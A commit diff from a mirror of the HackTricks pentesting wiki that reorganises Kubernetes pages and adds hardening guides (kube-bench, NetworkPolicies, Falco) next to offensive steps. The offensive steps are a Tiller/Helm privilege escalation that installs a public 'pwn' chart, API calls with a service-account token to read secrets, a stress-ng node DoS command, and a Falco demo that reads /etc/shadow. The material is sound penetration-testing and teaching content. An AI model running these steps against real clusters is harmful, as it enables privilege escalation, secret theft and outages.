1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00

GitBook: [#2926] No subject

This commit is contained in:
CPol 2021-12-29 12:26:06 +00:00 committed by gitbook-bot
parent 0adb39ac43
commit 8b28167db2
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
11 changed files with 498 additions and 126 deletions

View file

@ -218,6 +218,9 @@
* [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
* [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md)
* [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md)
* [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md)
* [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
* [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
* [7/tcp/udp - Pentesting Echo](pentesting/7-tcp-udp-pentesting-echo.md)
* [21 - Pentesting FTP](pentesting/pentesting-ftp/README.md)
* [FTP Bounce attack - Scan](pentesting/pentesting-ftp/ftp-bounce-attack.md)
@ -356,6 +359,7 @@
* [11211 - Pentesting Memcache](pentesting/11211-memcache.md)
* [15672 - Pentesting RabbitMQ Management](pentesting/15672-pentesting-rabbitmq-management.md)
* [27017,27018 - Pentesting MongoDB](pentesting/27017-27018-mongodb.md)
* [44134 - Pentesting Tiller (Helm)](pentesting/44134-pentesting-tiller-helm.md)
* [44818/UDP/TCP - Pentesting EthernetIP](pentesting/44818-ethernetip.md)
* [47808/udp - Pentesting BACNet](pentesting/47808-udp-bacnet.md)
* [50030,50060,50070,50075,50090 - Pentesting Hadoop](pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)

View file

@ -64,6 +64,29 @@ Then, you can **decompress** the image and **access the blobs** to search for su
tar -xf image.tar
```
### Basic Analysis
You can get **basic information** from the image running:
```bash
docker inspect <image>
```
You can also get a summary **history of changes** with:
```bash
docker history --no-trunc <image>
```
You can also generate a **dockerfile from an image** with:
```bash
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
### Dive
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) **** (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
```bash

View file

@ -0,0 +1,67 @@
# 44134 - Pentesting Tiller (Helm)
## Basic Information
Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. **Tiller** is the **service** **running** by default in the port 44134 offering the service.
**Default port:** 44134
```
PORT STATE SERVICE VERSION
44134/tcp open unknown
```
## Enumeration
If you can **enumerate pods and/or services** of different namespaces enumerate them and search for the ones with **"tiller" in their name**:
```bash
get pods | grep -i "tiller"
get services | grep -i "tiller"
get pods -n kube-system | grep -i "tiller"
get services -n kube-system | grep -i "tiller"
get pods -n <namespace> | grep -i "tiller"
get services -n <namespace> | grep -i "tiller"
```
Examples:
```bash
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
```
You could also try to find this service running checking the port 44134:
```bash
sudo nmap -sS -p 44134 <IP>
```
Once you have discovered it you can communicate with it downloading the client helm application. You can use tools like `homebrew`, or look at [**the official releases page**](https://github.com/helm/helm/releases)**.** For more details, or for other options, see [the installation guide](https://v2.helm.sh/docs/using\_helm/#installing-helm).
Then, you can **enumerate the service**:
```
helm --host tiller-deploy.kube-system:44134 version
```
### Privilege Escalation
By default **Helm2** was installed in the **namespace kube-system** with **high privileges**, so if you find the service and has access to it, this could allow you to **escalate privileges**.
All you need to do is to install a package like this one: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) **** that will give the **default service token access to everything in the whole cluster.**
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
```
In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and **** [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) **** inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**.

View file

@ -55,10 +55,6 @@ Another important details about enumeration and Kubernetes permissions abuse is
## Hardening Kubernetes
The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\
You can choose to:
* run kube-bench from inside a container (sharing PID namespace with the host)
* run a container that installs kube-bench on the host, and then run kube-bench directly on the host
* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases),
* compile it from source.
{% content-ref url="kubernetes-hardening/" %}
[kubernetes-hardening](kubernetes-hardening/)
{% endcontent-ref %}

View file

@ -50,6 +50,8 @@ As you are inside the Kubernetes environment, if you cannot escalate privileges
kubectl get svc --all-namespaces
```
By default, Kubernetes uses a flat networking schema, which means **any pod/service within the cluster can talk to other**. The **namespaces** within the cluster **don't have any network security restrictions by default**. Anyone in the namespace can talk to other namespaces.
### Scanning
The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s\_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster:
@ -83,6 +85,24 @@ Check out the following page to learn how you could **attack Kubernetes specific
In case the **compromised pod is running some sensitive service** where other pods need to authenticate you might be able to obtain the credentials send from the other pods.
### Node DoS
There is no specification of resources in the Kubernetes manifests and **not applied limit** ranges for the containers. As an attacker, we can **consume all the resources where the pod/deployment running** and starve other resources and cause a DoS for the environment.
This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
```
stress-ng --vm 2 --vm-bytes 2G --timeout 30s
```
You can see the difference between while running `stress-ng` and after
```bash
kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
```
![Scenario 13 kubectl top](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-13-3.png)
## Node Post-Exploitation
If you managed to **escape from the container** there are some interesting things you will find in the node:

View file

@ -96,12 +96,25 @@ They open a streaming connection that returns you the full manifest of a Deploym
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %}
### Using curl
From inside a pod you can use several env variables:
```bash
export APISERVER=https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
```
### Using kubectl
Having the token and the address of the API server you use kubectl or curl to access it as indicated here:
```bash
alias kubectl='kubectl --token=<jwt_token> --server=https://host:port --insecure-skip-tls-verify=true'
alias k='kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true'
```
You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). The goal of the following sections is to present in ordered manner different options to enumerate and understand the new K8s you have obtained access to.
@ -144,8 +157,8 @@ With this info you will know all the services you can list
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl api-resources --namespaced=true #Resources specific to a namespace
./kubectl api-resources --namespaced=false #Resources NOT specific to a namespace
k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace
```
{% endtab %}
{% endtabs %}
@ -155,20 +168,20 @@ With this info you will know all the services you can list
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl auth can-i --list #Get privileges in general
./kubectl auth can-i --list -n custnamespace #Get privileves in custnamespace
k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileves in custnamespace
# Get service account permissions
./kubectl auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>
```
{% endtab %}
{% tab title="API" %}
```bash
curl -i -s -k -X $'POST' \
-H "Authorization: Bearer $TOKEN" -H $'Content-Type: application/json' \
kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
```
{% endtab %}
{% endtabs %}
@ -192,14 +205,13 @@ Kubernetes supports **multiple virtual clusters** backed by the same physical cl
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl get namespaces
k get namespaces
```
{% endtab %}
{% tab title="API" %}
```bash
curl -k -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/
kurl -k -v https://$APISERVER/api/v1/namespaces/
```
{% endtab %}
{% endtabs %}
@ -209,18 +221,16 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespace
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get secrets -o yaml
./kubectl get secrets -o yaml -n custnamespace
k get secrets -o yaml
k get secrets -o yaml -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/default/secrets/
kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
curl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
```
{% endtab %}
{% endtabs %}
@ -228,7 +238,7 @@ https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
If you can read secrets you can use the following lines to get the privileges related to each to token:
```bash
for token in `./kubectl describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; ./kubectl --token $token auth can-i --list; echo; done
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
```
### Get Service Accounts
@ -238,14 +248,13 @@ As discussed at the begging of this page **when a pod is run a service account i
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl get serviceaccounts
k get serviceaccounts
```
{% endtab %}
{% tab title="API" %}
```bash
curl -k -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/{namespace}/serviceaccounts
curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
```
{% endtab %}
{% endtabs %}
@ -257,15 +266,14 @@ The deployments specify the **components** that need to be **run**.
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get deployments
./kubectl get deployments -n custnamespace
.k get deployments
k get deployments -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://<$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/<namespace>/deployments/
curl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
```
{% endtab %}
{% endtabs %}
@ -277,15 +285,14 @@ The Pods are the actual **containers** that will **run**.
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get pods
./kubectl get pods -n custnamespace
k get pods
k get pods -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://<$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/<namespace>/pods/
curl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
```
{% endtab %}
{% endtabs %}
@ -297,15 +304,14 @@ Kubernetes **services** are used to **expose a service in a specific port and IP
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get services
./kubectl get services -n custnamespace
k get services
k get services -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS>/api/v1/namespaces/default/services/
curl -v https://$APISERVER/api/v1/namespaces/default/services/
```
{% endtab %}
{% endtabs %}
@ -317,14 +323,13 @@ Get all the **nodes configured inside the cluster**.
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get nodes
k get nodes
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/nodes/
curl -v https://$APISERVER/api/v1/nodes/
```
{% endtab %}
{% endtabs %}
@ -336,14 +341,13 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/nodes/
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get daemonsets
k get daemonsets
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/extensions/v1beta1/namespaces/default/daemonsets
curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
```
{% endtab %}
{% endtabs %}
@ -355,14 +359,13 @@ Cron jobs allows to schedule using crontab like syntax the launch of a pod that
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get cronjobs
k get cronjobs
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
curl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
```
{% endtab %}
{% endtabs %}
@ -372,7 +375,7 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get all
k get all
```
{% endtab %}
{% endtabs %}
@ -382,7 +385,7 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl top pod --all-namespaces
k top pod --all-namespaces
```
{% endtab %}
{% endtabs %}

View file

@ -547,80 +547,6 @@ kubectl get secrets --all-namespaces -o json | kubectl replace -f -
* [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm)
## Kubernetes API Hardening
It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could be able to abuse it and damage in a lot of way the environment.\
It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any otehr connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**.
**Common Request process:**\
****User or K8s ServiceAccount > Authentication > Authorization > Admission Control.
**Tips**:
* Close ports.
* Avoid Anonymous access.
* NodeRestriction; No access from specific nodes to the API.
* [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
* Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
* And also, allows kubelets to add/remove/update these labels and label prefixes.
* Ensure with labels the secure workload isolation.
* Avoid specific pods from API access.
* Avoid ApiServer exposure to the internet.
* Avoid unauthorized access RBAC.
* ApiServer port with firewall and IP whitelisting.
## SecurityContext Hardening
By default root user will be used when a Pod is started if no other user is specified. You can run your application inside a more secure context using a template similar to the following one:
```yaml
apiVersion: v1
kind: Pod
metadata:
name: security-context-demo
spec:
securityContext:
runAsUser: 1000
runAsGroup: 3000
fsGroup: 2000
volumes:
- name: sec-ctx-vol
emptyDir: {}
containers:
- name: sec-ctx-demo
image: busybox
command: [ "sh", "-c", "sleep 1h" ]
securityContext:
runAsNonRoot: true
volumeMounts:
- name: sec-ctx-vol
mountPath: /data/demo
securityContext:
allowPrivilegeEscalation: true
```
* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
## General Hardening
You should update your Kubernetes environment as frequently as necessary to have:
* Dependencies up to date.
* Bug and security patches.
****[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch)
**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
* Upgrade the Master Node components following this sequence:
* etcd (all instances).
* kube-apiserver (all control plane hosts).
* kube-controller-manager.
* kube-scheduler.
* cloud controller manager, if you use one.
* Upgrade the Worker Node components such as kube-proxy, kubelet.
## References
{% embed url="https://sickrov.github.io/" %}

View file

@ -0,0 +1,127 @@
# Kubernetes Hardening
## Tools
### Kube-bench
The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\
You can choose to:
* run kube-bench from inside a container (sharing PID namespace with the host)
* run a container that installs kube-bench on the host, and then run kube-bench directly on the host
* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases),
* compile it from source.
### Kubeaudit
The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) **** is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns.
Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:
```
kubeaudit all
```
This tool also has the argument `autofix` to **automatically fix detected issues.**
### **Popeye**
[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive _over_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.
### **Kicks**
****[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications
### Checkov
****[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code.
It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning.
### **Monitoring with Falco**
{% content-ref url="monitoring-with-falco.md" %}
[monitoring-with-falco.md](monitoring-with-falco.md)
{% endcontent-ref %}
## Tips
### Kubernetes API Hardening
It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could be able to abuse it and damage in a lot of way the environment.\
It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**.
**Common Request process:**\
****User or K8s ServiceAccount > Authentication > Authorization > Admission Control.
**Tips**:
* Close ports.
* Avoid Anonymous access.
* NodeRestriction; No access from specific nodes to the API.
* [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
* Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
* And also, allows kubelets to add/remove/update these labels and label prefixes.
* Ensure with labels the secure workload isolation.
* Avoid specific pods from API access.
* Avoid ApiServer exposure to the internet.
* Avoid unauthorized access RBAC.
* ApiServer port with firewall and IP whitelisting.
### SecurityContext Hardening
By default root user will be used when a Pod is started if no other user is specified. You can run your application inside a more secure context using a template similar to the following one:
```yaml
apiVersion: v1
kind: Pod
metadata:
name: security-context-demo
spec:
securityContext:
runAsUser: 1000
runAsGroup: 3000
fsGroup: 2000
volumes:
- name: sec-ctx-vol
emptyDir: {}
containers:
- name: sec-ctx-demo
image: busybox
command: [ "sh", "-c", "sleep 1h" ]
securityContext:
runAsNonRoot: true
volumeMounts:
- name: sec-ctx-vol
mountPath: /data/demo
securityContext:
allowPrivilegeEscalation: true
```
* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
### Kubernetes NetworkPolicies
{% content-ref url="kubernetes-networkpolicies.md" %}
[kubernetes-networkpolicies.md](kubernetes-networkpolicies.md)
{% endcontent-ref %}
### General Hardening
You should update your Kubernetes environment as frequently as necessary to have:
* Dependencies up to date.
* Bug and security patches.
****[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch)
**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
* Upgrade the Master Node components following this sequence:
* etcd (all instances).
* kube-apiserver (all control plane hosts).
* kube-controller-manager.
* kube-scheduler.
* cloud controller manager, if you use one.
* Upgrade the Worker Node components such as kube-proxy, kubelet.

View file

@ -0,0 +1,122 @@
# Kubernetes NetworkPolicies
**This tutorial was taken from** [**https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html**](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html)****
### Scenario Information
This scenario is deploy a simple network security policy for Kubernetes resources to create security boundaries.
* To get started with this scenario ensure you must be using a networking solution which supports `NetworkPolicy`
### Scenario Solution
* The below scenario is from [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes)
If you want to control traffic flow at the IP address or port level (OSI layer 3 or 4), then you might consider using Kubernetes NetworkPolicies for particular applications in your cluster. NetworkPolicies are an application-centric construct which allow you to specify how a pod is allowed to communicate with various network "entities" (we use the word "entity" here to avoid overloading the more common terms such as "endpoints" and "services", which have specific Kubernetes connotations) over the network.
The entities that a Pod can communicate with are identified through a combination of the following 3 identifiers
1. Other pods that are allowed (exception: a pod cannot block access to itself) Namespaces that are allowed
2. IP blocks (exception: traffic to and from the node where a Pod is running is always allowed, regardless of the IP address of the Pod or the node)
3. When defining a pod- or namespace- based NetworkPolicy, you use a selector to specify what traffic is allowed to and from the Pod(s) that match the selector.
Meanwhile, when IP based NetworkPolicies are created, we define policies based on IP blocks (CIDR ranges).
* We will be creating DENY all traffic to an application
> This NetworkPolicy will drop all traffic to pods of an application, selected using Pod Selectors.
Use Cases:
* Its very common: To start whitelisting the traffic using Network Policies, first you need to blacklist the traffic using this policy.
* You want to run a Pod and want to prevent any other Pods communicating with it.
* You temporarily want to isolate traffic to a Service from other Pods.
![Scenario 20 NSP](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-1.gif)
#### Example
* Run a nginx Pod with labels `app=web` and expose it at port 80
```bash
kubectl run --image=nginx web --labels app=web --expose --port 80
```
* Run a temporary Pod and make a request to `web` Service
```bash
kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh
```
```bash
wget -qO- http://web
# You will see the below output
# <!DOCTYPE html>
# <html>
# <head>
# ...
```
* It works, now save the following manifest to `web-deny-all.yaml`, then apply to the cluster
```yaml
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: web-deny-all
spec:
podSelector:
matchLabels:
app: web
ingress: []
```
```bash
kubectl apply -f web-deny-all.yaml
```
#### Try it out
* Run a test container again, and try to query `web`
```bash
kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh
```
```bash
wget -qO- --timeout=2 http://web
# You will see the below output
# wget: download timed out
```
* Traffic dropped
#### [Remarks](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html#remarks)
* In the manifest above, we target Pods with app=web label to policy the network. This manifest file is missing the spec.ingress field. Therefore it is not allowing any traffic into the Pod.
* If you create another NetworkPolicy that gives some Pods access to this application directly or indirectly, this NetworkPolicy will be obsolete.
* If there is at least one NetworkPolicy with a rule allowing the traffic, it means the traffic will be routed to the pod regardless of the policies blocking the traffic.
#### Cleanup
```bash
kubectl delete pod web
kubectl delete service web
kubectl delete networkpolicy web-deny-all
```
* More referenecs and resources can be found at https://github.com/ahmetb/kubernetes-network-policy-recipes
### Cilium Editor - Network Policy Editor
A tool/framework to teach you how to create a network policy using the Editor. It explains basic network policy concepts and guides you through the steps needed to achieve the desired least-privilege security and zero-trust concepts.
* **Navigate to the Cilium Editor** [**https://editor.cilium.io/**](https://editor.cilium.io)****
![Scenario 20 NSP Cilium](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-2.png)
### Miscellaneous
* [https://kubernetes.io/docs/concepts/services-networking/network-policies/](https://kubernetes.io/docs/concepts/services-networking/network-policies/)
* [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes)
* [https://editor.cilium.io/](https://editor.cilium.io)

View file

@ -0,0 +1,71 @@
# Monitoring with Falco
This tutorial was taken from [https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-information](https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-information)
### Scenario Information
This scenario is deploy runtime security monitoring & detection for containers and kubernetes resources.
* To get started with this scenario you can deploy the below helm chart with version 3
> NOTE: Make sure you run the follwing deployment using Helm with v3.
```bash
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco
```
![Scenario 18 helm falco setup](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-1.png)
### [Scenario Solution](https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-solution)
> `Falco`, the cloud-native runtime security project, is the de facto Kubernetes threat detection engine. Falco was created by Sysdig in 2016 and is the first runtime security project to join CNCF as an incubation-level project. Falco detects unexpected application behavior and alerts on threats at runtime.
Falco uses system calls to secure and monitor a system, by:
* Parsing the Linux system calls from the kernel at runtime
* Asserting the stream against a powerful rules engine
* Alerting when a rule is violated
Falco ships with a default set of rules that check the kernel for unusual behavior such as:
* Privilege escalation using privileged containers
* Namespace changes using tools like `setns`
* Read/Writes to well-known directories such as /etc, /usr/bin, /usr/sbin, etc
* Creating symlinks
* Ownership and Mode changes
* Unexpected network connections or socket mutations
* Spawned processes using execve
* Executing shell binaries such as sh, bash, csh, zsh, etc
* Executing SSH binaries such as ssh, scp, sftp, etc
* Mutating Linux coreutils executables
* Mutating login binaries
* Mutating shadowutil or passwd executables such as shadowconfig, pwck, chpasswd, getpasswd, change, useradd, etc, and others.
* Get more details about the falco deployment
```bash
kubectl get pods --selector app=falco
```
![Scenario 18 falco get pods](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-2.png)
* Manually obtaining the logs from the falco systems
```bash
kubectl logs -f -l app=falco
```
* Now, let's spin up a hacker container and read senstive file and see if that detects by Falco
```bash
kubectl run --rm --restart=Never -it --image=madhuakula/hacker-container -- bash
```
* Read the sensitive file
```bash
cat /etc/shadow
```
![Scenario 18 falco detect /etc/shadow](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-3.png)

View file

@ -33,6 +33,7 @@ The following ports might be open in a Kubernetes cluster:
